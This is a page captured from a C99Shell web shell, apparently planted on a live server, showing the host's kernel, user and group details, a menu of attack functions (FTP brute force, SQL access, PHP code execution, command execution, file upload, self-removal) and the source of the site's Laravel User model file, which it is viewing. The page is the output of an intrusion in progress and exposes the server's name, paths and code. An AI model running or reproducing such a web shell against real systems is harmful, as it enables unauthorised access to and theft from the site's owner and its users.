!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/app/Models/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     User.php (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Models;

use 
Illuminate\Foundation\Auth\User as Authenticatable;

class 
User extends Authenticatable
{
    protected 
$fillable = [
        
'first_name',
        
'last_name',
        
'phone',
        
'email',
        
'password',
        
'photo',
        
'email_token',
        
'ship_address1',
        
'ship_address2',
        
'ship_zip',
        
'ship_city',
        
'ship_country',
        
'ship_company',
        
'bill_address1',
        
'bill_address2',
        
'bill_zip',
        
'bill_city',
        
'bill_country',
        
'bill_company',
        
'state_id'


    
];


    protected 
$hidden = [
        
'password'
    
];

    public function 
state()
    {
        return 
$this->belongsTo('App\Models\State')->withDefault();
    }

    public function 
products()
    {
        return 
$this->hasMany('App\Models\Item','vendor_id')->orderby('id','desc');
    }

    public function 
orders()
    {
        return 
$this->hasMany('App\Models\Order');
    }

    public function 
wishlists()
    {
        return 
$this->hasMany('App\Models\Wishlist');
    }

    public function 
reviews()
    {
        return 
$this->hasMany('App\Models\Review');
    }

    public function 
notifications()
    {
        return 
$this->hasMany('App\Models\Notification');
    }

    public function 
socialProviders()
    {
        return 
$this->hasMany('App\Models\SocialProvider');
    }

    public function 
withdraws()
    {
        return 
$this->hasMany('App\Models\Withdraw','vendor_id')->orderby('id','desc');
    }

    public function 
displayName()
    {
        return 
$this->first_name.' '.$this->last_name;
    }


    public function 
user_settings()
    {
        return 
$this->hasMany('App\Models\UserSetting');
    }


    public function 
wishlistCount()
    {
        return 
$this->wishlists()->whereHas('item', function($query) {
                    
$query->where('status''='1);
                })->
count();
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--